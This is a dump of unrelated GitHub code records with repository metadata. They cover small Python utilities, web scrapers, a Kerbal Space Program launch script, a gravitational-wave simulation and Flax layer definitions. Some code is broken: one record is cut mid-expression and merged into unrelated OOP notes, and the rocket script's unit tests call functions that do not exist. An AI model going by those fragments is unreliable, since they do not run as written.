Calculate_Age(birthdate):\n current_date = datetime.now()\n\n years_diff = current_date.year - birthdate.year\n months_diff = current_date.month - birthdate.month\n days_diff = current_date.day - birthdate.day\n\n if (current_date.year, current_date.month) < (birthdate.year, birthdate.month):\n years_diff -= 1\n\n if (current_date.month, current_date.day) < (birthdate.month, birthdate.day):\n months_diff -= 1\n\n return years_diff, months_diff, days_diff\n\nbirth_year = int(input('Enter the birth year: '))\nbirth_month = int(input('Enter the birth month: '))\nbirth_day = int(input('Enter the birth day: '))\n\nbirthdate = datetime(birth_year, birth_month, birth_day)\n\nyears, months, days = Calculate_Age(birthdate)\n\nprint(f'The age is {years} years, {months} months and {days} days ')","repo_name":"vijaypathem/MyProjects-python","sub_path":"Find_age1.py","file_name":"Find_age1.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33990380594","text":"import scrapy\r\nimport saves\r\n\r\nclass PublisherSpider(scrapy.Spider):\r\n\tname = \"publishers\"\r\n\tstart_urls = [\"https://www.fakku.net/hentai/publishers\"]\r\n\r\n\tdef parse(self, response):\r\n\r\n\t\t#save file\r\n\t\tfilename = \"f-publisher.html\"\r\n\t\tsaves.save_file(response.body, filename)\r\n\r\n\t\thref = response.css(\"a.attribute-row::attr(href)\").extract()\r\n\t\tfor link in href:\r\n\t\t\tyield scrapy.Request(response.urljoin(link), callback = self.parse_pub)\r\n\r\n\tdef parse_pub(self, response):\r\n\t\tdef extract_with_css(query):\r\n\t\t\treturn response.css(query).extract_first().strip()\r\n\r\n\t\tname = extract_with_css(\"h1.attribute-title::text\").replace(\"Hentai\", \"\").strip()\r\n\t\t#Saving the file\r\n\t\tfilename = \"publisher-{}.html\".format(name.lower().replace(\" \", \"-\"))\r\n\t\tsaves.save_file(response.body, filename)\r\n\r\n\t\tyield {\r\n\t\t\t\"name\": name,\r\n\t\t\t\"followers\": extract_with_css(\"div.attribute-subscribers 
span::text\")\r\n\t\t}","repo_name":"HBeats/spiders","sub_path":"publishers_spider.py","file_name":"publishers_spider.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70170978327","text":"# Modified by David Garrett\n# 3-23-2021\n# Test - Chapter 2\n\nprint('MPG calculator')\nmiles_driven = float(input('How many miles did you drive? '))\n# Eliminated \"miles_driven = int(user_input)\" line. user_input variable has no assigned value.\n# \"input('How many miles did you drive? ')\" line is now assigned to miles_driven. Allows the calculation later to work.\n# Encompassed input function with the float() function. Converts text value to a numerical value. Also, simplifies the code\n# Changed int() to float() function to allow for decimal values\ngallons_purchased = float(input('How much gas did you use? ')) # Changed int() to float()\nmpg = miles_driven / gallons_purchased # Changed integer division operator to division operator to allow for values with decimals\n# Eliminated \"mpg = format(mpg, '2f')\" line. Format function added to next line. Simplifies code.\nprint('You got', format(mpg, '.2f'), 'miles per gallon.')\n# Changed the format of mpg from '2f' to '.2f' to format value to two decimal places. '2f' doesn't format the number.\n","repo_name":"DavidWGarrett/EET107_Python","sub_path":"CH2.py","file_name":"CH2.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"830686035","text":"#Bellmann-Ford Algorithm\nimport sys\nread = sys.stdin.readline\nINF = sys.maxsize\n\nN, M = map(int, read().split())\ndist = [INF for _ in range(N+1)]\nedges, dist[1] = [], 0\nfor _ in range(M):\n edges.append(list(map(int, read().split())))\n\nfor i in range(N): # If there is no negative cycle, only N-1 iterations are required.\n for u, v, w in edges: # Check all edges every time.\n if dist[u] != INF and dist[v] > dist[u] + w:\n if i == N-1: # 'dist' changed at Nth iteration, therefore negative cycle exists.\n print(-1)\n sys.exit(0)\n dist[v] = dist[u] + w\n\nfor i in range(2, N+1):\n print(-1 if dist[i]==INF else dist[i])\n","repo_name":"KeenyJin/BAEKJOON","sub_path":"Graph/11657.py","file_name":"11657.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"11258584190","text":"from User.signals import myuser_logged_in\n\n\ndef after_login_callback(sender, user, request, **kwargs):\n import datetime\n if user:\n user.latest_login = datetime.datetime.now()\n user.save()\n\nmyuser_logged_in.connect(after_login_callback, dispatch_uid=\"update_lastest_login\")","repo_name":"mutoulbj/BOHOO","sub_path":"User/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"33647169049","text":"def getForgotten(speech, text):\n speechList = speech.split(\" \")\n textList = text.split(\" \")\n \n forgotList = []\n \n for elem in textList:\n \n if(elem not in speechList):\n print(\"uh oh\")\n forgotList.append(elem.upper())\n else:\n forgotList.append(elem)\n \n \n return \" \".join(forgotList);\n \ndef getExtra(speech, text):\n speechList = speech.split(\" \")\n textList = text.split(\" \")\n \n extraList = []\n \n for elem in speechList:\n \n if(elem not in textList):\n print(\"uh oh\")\n 
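For the Bellman-Ford record above (problem 11657): a negative cycle is detected when any edge still relaxes on the N-th pass. A minimal self-contained sketch of the same check, with a hypothetical toy graph in place of the stdin input:

```python
import sys

INF = sys.maxsize

def bellman_ford(n, edges, src=1):
    """Return 1-indexed distances from src, or None if a negative cycle is reachable."""
    dist = [INF] * (n + 1)
    dist[src] = 0
    for i in range(n):  # N passes; pass N exists only to detect negative cycles
        for u, v, w in edges:
            if dist[u] != INF and dist[v] > dist[u] + w:
                if i == n - 1:
                    return None  # still relaxing on the N-th pass: negative cycle
                dist[v] = dist[u] + w
    return dist

# Hypothetical graph: 1->2 (4), 1->3 (3), 2->3 (-1); no negative cycle.
print(bellman_ford(3, [(1, 2, 4), (1, 3, 3), (2, 3, -1)])[1:])  # [0, 4, 3]
```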
extraList.append(elem.upper())\n else:\n extraList.append(elem)\n \n \n return \" \".join(extraList);\n \ndef countUmLike(text):\n textList = text.split(\" \");\n count = 0\n \n for elem in textList:\n if(elem == \"um\" or elem == \"like\"):\n count += 1\n \n return count\n \n","repo_name":"anish-krishnan/Syft","sub_path":"SpeechAnalysis/forgottenText.py","file_name":"forgottenText.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"1474836130","text":"import gradio as gr\nfrom PIL import Image\nfrom urllib.request import Request, urlopen\n\ndef display_image_from_url(url, input_image):\n if url == '' and input_image is None:\n return None, \"\", \"\"\n\n image = None\n if url != '':\n req = Request(\n url=url, \n headers={'User-Agent': 'Mozilla/5.0'}\n )\n res = urlopen(req)\n image = Image.open(res)\n image.load()\n\n\n if input_image is not None:\n image = input_image\n\n parameters = \"Parameters have been erased from this image or unsupported format\"\n if 'parameters' in image.info:\n parameters = image.info['parameters']\n\n return image, parameters, image.info\n\nblocks = gr.Blocks(css=\"#out_image {height: 400px}\")\nwith blocks as png_info:\n with gr.Row():\n gr.Markdown(\n \"\"\"\n Report any issues on the [GitHub](https://github.com/andzhik/png-params) page of this project\n \"\"\")\n with gr.Row().style(equal_height=False):\n with gr.Column():\n in_url = gr.Textbox(label=\"Source URL\")\n in_image = gr.Image(label=\"Source Image\", type='pil')\n with gr.Row():\n btn_submit = gr.Button(\"Submit\", variant=\"primary\")\n\n with gr.Column():\n out_image = gr.Image(type='pil', elem_id=\"out_image\")\n out_info = gr.Textbox(label=\"Generation Parameters\")\n out_meta = gr.Textbox(label=\"Metadata\")\n \n btn_submit.click(fn=display_image_from_url,\n inputs=[in_url, in_image],\n outputs=[out_image, out_info, out_meta])\n \npng_info.launch()\n","repo_name":"andzhik/png-params","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"15662442281","text":"#This program launches a rocket into orbit in Kerbal Space Program.\r\n#Created by Eric Fernald.\r\n\r\n\"\"\"\r\nTo run this KSP kRPC Python program you need:\r\n- Kerbal Space Program (tested in 1.5.1)\r\n- OrbitRocket Craft file included in the directory.\r\n- kRPC 0.4.8 (https://github.com/krpc/krpc/releases/download/v0.4.8/krpc-0.4.8.zip)\r\n Use the install guide on https://krpc.github.io/krpc/getting-started.html\r\n- I've also installed the Python client library (https://pypi.python.org/pypi/krpc)\r\n- Python 3.9.1 (https://www.python.org/downloads/release/python-391/)\r\n\"\"\"\r\n\r\nimport krpc\r\nimport time \r\nimport unittest\r\nimport RocketLaunch\r\n\r\n#Establishes connection to the krpc server.\r\nconn = krpc.connect()\r\n\r\n#Establishes the rocket as the main vessel.\r\nvessel = conn.space_center.active_vessel\r\n\r\n#Countdown Sequence.\r\ncountdown = [\"Five\", \"Four\", \"Three\", \"Two\", \"One\", \"LIFT OFF!\"]\r\n\r\n#Start the Countdown Sequence.\r\nfor i in range(len(countdown)):\r\n print(countdown[i])\r\n time.sleep(1)\r\n\r\nvessel.control.throttle = 1\r\nvessel.control.activate_next_stage()\r\n\r\n#Flight State.\r\nascentPhase = True\r\ncruisePhase = False\r\ninsertionPhase = False\r\n\r\n#Main Launch Control.\r\nwhile ascentPhase or cruisePhase or insertionPhase:\r\n 
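The png-params record above reads generation parameters from `image.info['parameters']`, which Pillow fills from PNG text chunks. A minimal round-trip sketch (the file name and parameter string are made up for the example):

```python
from PIL import Image
from PIL.PngImagePlugin import PngInfo

# Write a PNG that carries a 'parameters' text chunk.
meta = PngInfo()
meta.add_text("parameters", "steps: 20, sampler: Euler a, cfg: 7")
Image.new("RGB", (8, 8)).save("demo.png", pnginfo=meta)

# Read it back the same way the Gradio app does.
img = Image.open("demo.png")
print(img.info.get("parameters", "parameters erased or unsupported format"))
```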
altitude = vessel.flight().mean_altitude\r\n heading = vessel.flight().heading\r\n\r\n #Ascent Phase.\r\n if ascentPhase:\r\n targetPitch = 90 * ((50000 - altitude) / 50000)\r\n pitchDiff = vessel.flight().pitch - targetPitch\r\n\r\n #Heading Control.\r\n if heading < 180:\r\n vessel.control.yaw = (pitchDiff / 90)\r\n else:\r\n vessel.control.yaw = 0.5\r\n\r\n #Adds another stage activation to the vessel if more than one stage is required to get to orbit.\r\n if vessel.thrust == 0.0:\r\n vessel.control.activate_next_stage()\r\n \r\n #MECO (Main Engine Cut Off)\r\n if vessel.orbit.apoapsis > 690000:\r\n vessel.control.throttle = 0\r\n time.sleep(0.5)\r\n vessel.control.activate_next_stage()\r\n\r\n vessel.control.sas = True\r\n time.sleep(0.1)\r\n vessel.control.sas_mode = conn.space_center.SASMode.prograde\r\n\r\n ascentPhase = False\r\n cruisePhase = True\r\n \r\n #Cruise Phase.\r\n elif cruisePhase:\r\n if altitude > 80000:\r\n cruisePhase = False\r\n insertionPhase = True\r\n vessel.control.sas = False\r\n vessel.control.throttle = 1\r\n\r\n #Insertion Phase.\r\n elif insertionPhase:\r\n targetPitch = 0\r\n pitchDiff = vessel.flight().pitch - targetPitch\r\n\r\n #Heading Control.\r\n if heading < 180:\r\n vessel.control.yaw = (pitchDiff / 90)\r\n if vessel.flight().pitch < 1 and vessel.flight().pitch > -1:\r\n vessel.control.sas = True\r\n else:\r\n vessel.control.sas = False\r\n else:\r\n vessel.control.yaw = 0.5\r\n\r\n #SECO (Second Engine Cut Off).\r\n if vessel.orbit.periapsis > 690000:\r\n vessel.control.throttle = 0\r\n insertionPhase = False\r\n \r\n #Staging.\r\n if vessel.thrust == 0.0:\r\n vessel.control.activate_next_stage()\r\n\r\nclass TestRocketLaunch(unittest.TestCase):\r\n def setUp(self):\r\n self.conn = krpc.connect()\r\n self.vessel = self.conn.space_center.active_vessel\r\n\r\n def test_countdown(self):\r\n countdown = [\"Five\", \"Four\", \"Three\", \"Two\", \"One\", \"LIFT OFF!\"]\r\n RocketLaunch.start_countdown(self.vessel)\r\n self.assertEqual(RocketLaunch.countdown, countdown)\r\n\r\n def test_ascent_phase(self):\r\n RocketLaunch.ascent_phase(self.vessel)\r\n self.assertTrue(RocketLaunch.ascentPhase)\r\n\r\n def test_cruise_phase(self):\r\n RocketLaunch.cruise_phase(self.vessel)\r\n self.assertTrue(RocketLaunch.cruisePhase)\r\n\r\n def test_insertion_phase(self):\r\n RocketLaunch.insertion_phase(self.vessel)\r\n self.assertTrue(RocketLaunch.insertionPhase)\r\n\r\nif __name__ == '__main__':\r\n unittest.main()","repo_name":"Eric-Fernald/Personal-Coding-Projects","sub_path":"Projects/Kerbal Space Program Rocket To Orbit/RocketLaunch.py","file_name":"RocketLaunch.py","file_ext":"py","file_size_in_byte":4065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12849404285","text":"#This code is a crawler to get park on www.meituan.com\n\n# -*- coding: utf-8 -*-\nimport requests\nimport json\nimport io\nimport os\nimport re\nimport random\nimport codecs\n\ndef get_park():\n url = \"https://i.meituan.com/notel/proxy?requestUrl=http%3A%2F%2Fapimobile.vip.sankuai.com%2Fgroup%2Fv2%2Farea%2Flist%3Fuuid%3D618C49BDF412F34E95C59B7AD8E819474772EAE2E66CBA65F99446E128F32FB5%26cityId%3D10\"\n headers = {\n \"Accept\": \"application/json\",\n \"X-Requested-With\" : \"XMLHttpRequest\",\n \"Referer\": \"https://i.meituan.com/trip/lvyou/triplist/poi/?stid_b=1&cevent=imt%2Fhomepage%2Fcategory1%2F195\",\n \"User-Agent\": \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) 
Version/11.0 Mobile/15A372 Safari/604.1\"\n }\n query_string = {\n \"requestUrl\" : \"http://apimobile.vip.sankuai.com/group/v2/area/list?uuid=618C49BDF412F34E95C59B7AD8E819474772EAE2E66CBA65F99446E128F32FB5&cityId=10\"\n }\n response = requests.get(url,data=query_string,headers=headers)\n json_str = response.content.decode()\n ret1 = json.loads(json_str)['data']['landmarks']\n park_all = []\n for element in ret1:\n if element['type']==3:\n element_s = \"上海市\" + element['name']\n park = json.dumps(element_s,ensure_ascii=False,indent=2)\n park_all.append(park)\n all = len(park_all)\n number = random.sample(range(0,all-1),10)\n park = []\n with open(\"park_select.txt\",\"w\",encoding=\"utf-8\") as f:\n for i in number:\n park.append(park_all[i])\n f.write(park_all[i])\n f.write(\"\\n\")\n print(\"\\n\")\n print(\"开始寻找公园\")\n print(park)\n price_park = []\n for i in range(10):\n price_park.append('0')\n return park, price_park\n","repo_name":"zhaoyiran924/Dating-Route-Recommendation","sub_path":"get_park.py","file_name":"get_park.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"70856798488","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport pandas as pd\n\nfrom numpy.random import default_rng\n\nimport time\nimport json\n\nfrom tqdm import tqdm\nfrom astropy.cosmology import FlatLambdaCDM\n\nimport argparse\n\nimport GWFish.modules as gw\n\ncosmo = FlatLambdaCDM(H0=69.6, Om0=0.286)\n\nrng = default_rng()\n\ndef main():\n # example to run with command-line arguments:\n # python CBC_Simulation.py --pop_file=CBC_pop.hdf5 --detectors ET CE2 --networks [[0,1],[0],[1]]\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--pop_file', type=str, default='./injections/CBC_pop.hdf5', nargs=1,\n help='Population to run the analysis on.'\n 'Runs on BBH_1e5.hdf5 if no argument given.')\n parser.add_argument(\n '--pop_id', type=str, default='BBH', nargs=1,\n help='Short population identifier for file names. Uses BBH if no argument given.')\n parser.add_argument(\n '--detectors', type=str, default=['ET'], nargs='+',\n help='Detectors to analyze. Uses ET as default if no argument given.')\n parser.add_argument(\n '--networks', default='[[0]]', nargs=1,\n help='Network IDs. Uses [[0]] as default if no argument given.')\n parser.add_argument(\n '--config', type=str, default='GWFish/detectors.yaml',\n help='Configuration file where the detector specifications are stored. Uses GWFish/detectors.yaml as default if no argument given.')\n \n\n args = parser.parse_args()\n ConfigDet = args.config\n\n threshold_SNR = np.array([0., 9.]) # [min. individual SNR to be included in PE, min. 
network SNR for detection]\n calculate_errors = False # whether to calculate Fisher-matrix based PE errors\n duty_cycle = False # whether to consider the duty cycle of detectors\n\n fisher_parameters = ['ra', 'dec', 'psi', 'theta_jn', 'luminosity_distance', 'mass_1', 'mass_2', 'geocent_time', 'phase']\n #fisher_parameters = ['luminosity_distance','ra','dec']\n\n pop_file = args.pop_file\n population = args.pop_id\n\n detectors_ids = args.detectors\n networks_ids = json.loads(args.networks)\n\n parameters = pd.read_hdf(pop_file)\n\n network = gw.detection.Network(detectors_ids, detection_SNR=threshold_SNR, parameters=parameters,\n fisher_parameters=fisher_parameters, config=ConfigDet)\n\n # lisaGWresponse(network.detectors[0], frequencyvector)\n # exit()\n\n # horizon(network, parameters.iloc[0], frequencyvector, threshold_SNR, 1./df, fmax)\n # exit()\n\n #waveform_model = 'gwfish_TaylorF2'\n waveform_model = 'gwfish_IMRPhenomD'\n #waveform_model = 'lalsim_TaylorF2'\n #waveform_model = 'lalsim_IMRPhenomD'\n # waveform_model = 'lalsim_IMRPhenomXPHM'\n\n\n print('Processing CBC population')\n for k in tqdm(np.arange(len(parameters))):\n parameter_values = parameters.iloc[k]\n\n networkSNR_sq = 0\n for d in np.arange(len(network.detectors)):\n wave, t_of_f = gw.waveforms.hphc_amplitudes(waveform_model, parameter_values,\n network.detectors[d].frequencyvector)\n #plot=network.detectors[d].plotrange)\n signal = gw.detection.projection(parameter_values, network.detectors[d], wave, t_of_f)\n\n SNRs = gw.detection.SNR(network.detectors[d], signal, duty_cycle=duty_cycle)\n networkSNR_sq += np.sum(SNRs ** 2)\n network.detectors[d].SNR[k] = np.sqrt(np.sum(SNRs ** 2))\n\n if calculate_errors:\n network.detectors[d].fisher_matrix[k, :, :] = \\\n gw.fishermatrix.FisherMatrix(waveform_model, parameter_values, fisher_parameters, network.detectors[d])\n\n network.SNR[k] = np.sqrt(networkSNR_sq)\n\n gw.detection.analyzeDetections(network, parameters, population, networks_ids)\n\n if calculate_errors:\n gw.fishermatrix.analyzeFisherErrors(network, parameters, fisher_parameters, population, networks_ids)\n\nif __name__ == '__main__':\n start_time = time.time()\n main()\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n","repo_name":"bvgoncharov/GWFish-old","sub_path":"CBC_Simulation.py","file_name":"CBC_Simulation.py","file_ext":"py","file_size_in_byte":4127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41693868096","text":"# -*- coding: utf-8 -*-\n\"\"\"\n CreatedDate: 2022-06-17\n FileName : dailyTemperatures.py\n Author : Honghe\n Descreption: 剑指 Offer II 038. 
每日温度\n\"\"\"\n\n\nclass Solution(object):\n def dailyTemperatures(self, temperatures):\n \"\"\"\n 暴力法\n :type temperatures: List[int]\n :rtype: List[int]\n \"\"\"\n res = []\n\n for index,i in enumerate(temperatures[:-1]):\n dif = 0\n for index2,j in enumerate(temperatures[index+1:]):\n if j>i:\n dif = index2+1\n break\n res.append(dif)\n res.append(0)\n return res\n\n def dailyTemperatures2(self, tokens):\n \"\"\"\n 单调栈\n :type tokens: List[str]\n :rtype: int\n \"\"\"\n length = len(tokens)\n res = [0]*length\n stack = []\n for i in range(length):\n while stack and tokens[stack[-1]] Class[blueprint]\nharry - -> harry ki info wala form - -> Object[entity]\ntom - -> tom ki info wala form - -> Object[entity]\nshubham - - shubham ki info wala form - -> Object[entity]\n# shubham.changeName(\"Shubhi\") '''\n","repo_name":"dassujan/100_DAYS_OF_PYTHON_CWH","sub_path":"56 Day56 - Intro to oops.py","file_name":"56 Day56 - Intro to oops.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"74320532249","text":"from collections.abc import Iterable # pylint: disable=g-importing-member\nfrom flax import struct\nfrom flax.core import Scope\nfrom flax.linen import initializers\nfrom jax import lax\n\nimport jax.numpy as jnp\nimport numpy as np\n\n\ndefault_kernel_init = initializers.lecun_normal()\n\n\ndef _normalize_axes(axes, ndim):\n # A tuple by convention. len(axes_tuple) then also gives the rank efficiently.\n return tuple(ax if ax >= 0 else ndim + ax for ax in axes)\n\n\ndef dense_general(\n scope,\n inputs,\n features,\n axis=-1,\n batch_dims=(),\n bias=True,\n dtype=jnp.float32,\n kernel_init=default_kernel_init,\n bias_init=initializers.zeros_init(),\n precision=None,\n):\n \"\"\"Applies a linear transformation to the inputs along multiple dimensions.\n\n Args:\n inputs: The nd-array to be transformed.\n features: tuple with numbers of output features.\n axis: tuple with axes to apply the transformation on.\n batch_dims: tuple with batch axes.\n bias: whether to add a bias to the output (default: True).\n dtype: the dtype of the computation (default: float32).\n kernel_init: initializer function for the weight matrix.\n bias_init: initializer function for the bias.\n precision: numerical precision of the computation see `jax.lax.Precision`\n for details.\n Returns:\n The transformed input.\n \"\"\"\n inputs = jnp.asarray(inputs, dtype)\n\n if not isinstance(features, Iterable):\n features = (features,)\n if not isinstance(axis, Iterable):\n axis = (axis,)\n if not isinstance(batch_dims, Iterable):\n batch_dims = (batch_dims,)\n features, axis, batch_dims = tuple(features), tuple(axis), tuple(batch_dims)\n\n if batch_dims:\n max_dim = np.max(batch_dims)\n if set(batch_dims) != set(range(max_dim + 1)):\n raise ValueError(\n 'batch_dims %s must be consecutive leading '\n 'dimensions starting from 0.'\n % str(batch_dims)\n )\n\n ndim = inputs.ndim\n n_batch_dims = len(batch_dims)\n axis = _normalize_axes(axis, ndim)\n batch_dims = _normalize_axes(batch_dims, ndim)\n n_axis, n_features = len(axis), len(features)\n\n def kernel_init_wrap(rng, shape, dtype=jnp.float32):\n size_batch_dims = np.prod(shape[:n_batch_dims], dtype=np.int32)\n flat_shape = (\n np.prod(shape[n_batch_dims : n_axis + n_batch_dims]),\n np.prod(shape[-n_features:]),\n )\n kernel = jnp.concatenate(\n [kernel_init(rng, flat_shape, dtype) for _ in range(size_batch_dims)],\n axis=0,\n )\n return jnp.reshape(kernel, shape)\n\n 
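In the flax record in progress here, `dense_general` and `dense` both bottom out in a single `lax.dot_general` call. A standalone sketch of the contraction `dense` performs, with assumed shapes and no flax scope:

```python
import jax.numpy as jnp
from jax import lax, random

x = random.normal(random.PRNGKey(0), (4, 8))   # (batch, in_features)
w = random.normal(random.PRNGKey(1), (8, 3))   # (in_features, out_features)

# Contract the last axis of x against the first axis of w; no batch dims.
y = lax.dot_general(x, w, (((x.ndim - 1,), (0,)), ((), ())))
assert y.shape == (4, 3)
assert jnp.allclose(y, x @ w)
```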
batch_shape = tuple(inputs.shape[ax] for ax in batch_dims)\n kernel_shape = tuple(inputs.shape[ax] for ax in axis) + features\n kernel = scope.param('kernel', kernel_init_wrap, batch_shape + kernel_shape)\n kernel = jnp.asarray(kernel, dtype)\n\n batch_ind = tuple(range(n_batch_dims))\n contract_ind = tuple(range(n_batch_dims, n_axis + n_batch_dims))\n out = lax.dot_general(\n inputs,\n kernel,\n ((axis, contract_ind), (batch_dims, batch_ind)),\n precision=precision,\n )\n if bias:\n\n def bias_init_wrap(rng, shape, dtype=jnp.float32):\n size_batch_dims = np.prod(shape[:n_batch_dims], dtype=np.int32)\n flat_shape = (np.prod(shape[-n_features:]),)\n bias = jnp.concatenate(\n [bias_init(rng, flat_shape, dtype) for _ in range(size_batch_dims)],\n axis=0,\n )\n return jnp.reshape(bias, shape)\n\n bias = scope.param('bias', bias_init_wrap, batch_shape + features)\n\n # Reshape bias for broadcast.\n expand_dims = sorted(set(range(inputs.ndim)) - set(axis) - set(batch_dims))\n for ax in expand_dims:\n bias = jnp.expand_dims(bias, ax)\n bias = jnp.asarray(bias, dtype)\n out = out + bias\n return out\n\n\ndef dense(\n scope,\n inputs,\n features,\n bias=True,\n dtype=jnp.float32,\n precision=None,\n kernel_init=default_kernel_init,\n bias_init=initializers.zeros_init(),\n):\n \"\"\"Applies a linear transformation to the inputs along the last dimension.\n\n Args:\n inputs: The nd-array to be transformed.\n features: the number of output features.\n bias: whether to add a bias to the output (default: True).\n dtype: the dtype of the computation (default: float32).\n precision: numerical precision of the computation see `jax.lax.Precision`\n for details.\n kernel_init: initializer function for the weight matrix.\n bias_init: initializer function for the bias.\n Returns:\n The transformed input.\n \"\"\"\n inputs = jnp.asarray(inputs, dtype)\n kernel = scope.param('kernel', kernel_init, (inputs.shape[-1], features))\n kernel = jnp.asarray(kernel, dtype)\n y = lax.dot_general(\n inputs,\n kernel,\n (((inputs.ndim - 1,), (0,)), ((), ())),\n precision=precision,\n )\n if bias:\n bias = scope.param('bias', bias_init, (features,))\n bias = jnp.asarray(bias, dtype)\n y += jnp.reshape(bias, (1,) * (y.ndim - 1) + (-1,))\n return y\n\n\ndef _conv_dimension_numbers(input_shape):\n \"\"\"Computes the dimension numbers based on the input shape.\"\"\"\n ndim = len(input_shape)\n lhs_spec = (0, ndim - 1) + tuple(range(1, ndim - 1))\n rhs_spec = (ndim - 1, ndim - 2) + tuple(range(0, ndim - 2))\n out_spec = lhs_spec\n return lax.ConvDimensionNumbers(lhs_spec, rhs_spec, out_spec)\n\n\ndef conv(\n scope,\n inputs,\n features,\n kernel_size,\n strides=None,\n padding='SAME',\n input_dilation=None,\n kernel_dilation=None,\n feature_group_count=1,\n bias=True,\n dtype=jnp.float32,\n precision=None,\n kernel_init=default_kernel_init,\n bias_init=initializers.zeros_init(),\n):\n \"\"\"Applies a convolution to the inputs.\n\n Args:\n inputs: input data with dimensions (batch, spatial_dims..., features).\n features: number of convolution filters.\n kernel_size: shape of the convolutional kernel.\n strides: a sequence of `n` integers, representing the inter-window\n strides.\n padding: either the string `'SAME'`, the string `'VALID'`, or a sequence\n of `n` `(low, high)` integer pairs that give the padding to apply before\n and after each spatial dimension.\n input_dilation: `None`, or a sequence of `n` integers, giving the\n dilation factor to apply in each spatial dimension of `inputs`.\n Convolution with input dilation `d` 
is equivalent to transposed\n convolution with stride `d`.\n kernel_dilation: `None`, or a sequence of `n` integers, giving the\n dilation factor to apply in each spatial dimension of the convolution\n kernel. Convolution with kernel dilation is also known as 'atrous\n convolution'.\n feature_group_count: integer, default 1. If specified divides the input\n features into groups.\n bias: whether to add a bias to the output (default: True).\n dtype: the dtype of the computation (default: float32).\n precision: numerical precision of the computation see `jax.lax.Precision`\n for details.\n kernel_init: initializer for the convolutional kernel.\n bias_init: initializer for the bias.\n Returns:\n The convolved data.\n \"\"\"\n\n inputs = jnp.asarray(inputs, dtype)\n\n if strides is None:\n strides = (1,) * (inputs.ndim - 2)\n\n in_features = inputs.shape[-1]\n assert in_features % feature_group_count == 0\n kernel_shape = kernel_size + (in_features // feature_group_count, features)\n kernel = scope.param('kernel', kernel_init, kernel_shape)\n kernel = jnp.asarray(kernel, dtype)\n\n dimension_numbers = _conv_dimension_numbers(inputs.shape)\n y = lax.conv_general_dilated(\n inputs,\n kernel,\n strides,\n padding,\n lhs_dilation=input_dilation,\n rhs_dilation=kernel_dilation,\n dimension_numbers=dimension_numbers,\n feature_group_count=feature_group_count,\n precision=precision,\n )\n\n if bias:\n bias = scope.param('bias', bias_init, (features,))\n bias = jnp.asarray(bias, dtype)\n y += jnp.reshape(bias, (1,) * (y.ndim - 1) + (-1,))\n return y\n\n\ndef conv_transpose(\n scope,\n inputs,\n features,\n kernel_size,\n strides=None,\n padding='SAME',\n kernel_dilation=None,\n bias=True,\n dtype=jnp.float32,\n precision=None,\n kernel_init=default_kernel_init,\n bias_init=initializers.zeros_init(),\n):\n \"\"\"Applies a transposed convolution to the inputs. Behaviour mirrors that of\n `jax.lax.conv_transpose`.\n\n Args:\n scope: functional scope.\n inputs: input data with dimensions (batch, spatial_dims..., features).\n features: number of convolution filters.\n kernel_size: shape of the convolutional kernel.\n strides: a sequence of `n` integers, representing the inter-window\n strides.\n padding: either the string `'SAME'`, the string `'VALID'`, or a sequence\n of `n` `(low, high)` integer pairs that give the padding to apply before\n and after each spatial dimension.\n kernel_dilation: `None`, or a sequence of `n` integers, giving the\n dilation factor to apply in each spatial dimension of the convolution\n kernel. 
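The `_conv_dimension_numbers` helper above hand-builds the NHWC-input / HWIO-kernel layout; `jax.lax` can derive the same spec from layout strings, which makes a quick shape check easy (sizes are arbitrary):

```python
import jax.numpy as jnp
from jax import lax

x = jnp.zeros((1, 8, 8, 3))    # (batch, H, W, in_features)            -> 'NHWC'
k = jnp.zeros((3, 3, 3, 16))   # (kH, kW, in_features, out_features)   -> 'HWIO'

dn = lax.conv_dimension_numbers(x.shape, k.shape, ('NHWC', 'HWIO', 'NHWC'))
y = lax.conv_general_dilated(x, k, window_strides=(1, 1), padding='SAME',
                             dimension_numbers=dn)
print(y.shape)  # (1, 8, 8, 16)
```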
Convolution with kernel dilation is also known as 'atrous\n convolution'.\n bias: whether to add a bias to the output (default: True).\n dtype: the dtype of the computation (default: float32).\n precision: numerical precision of the computation see `jax.lax.Precision`\n for details.\n kernel_init: initializer for the convolutional kernel.\n bias_init: initializer for the bias.\n Returns:\n The convolved data.\n \"\"\"\n inputs = jnp.asarray(inputs, dtype)\n strides = strides or (1,) * (inputs.ndim - 2)\n\n in_features = inputs.shape[-1]\n kernel_shape = kernel_size + (in_features, features)\n kernel = scope.param('kernel', kernel_init, kernel_shape)\n kernel = jnp.asarray(kernel, dtype)\n\n y = lax.conv_transpose(\n inputs,\n kernel,\n strides,\n padding,\n rhs_dilation=kernel_dilation,\n precision=precision,\n )\n\n if bias:\n bias = scope.param('bias', bias_init, (features,))\n bias = jnp.asarray(bias, dtype)\n y += jnp.reshape(bias, (1,) * (y.ndim - 1) + (-1,))\n return 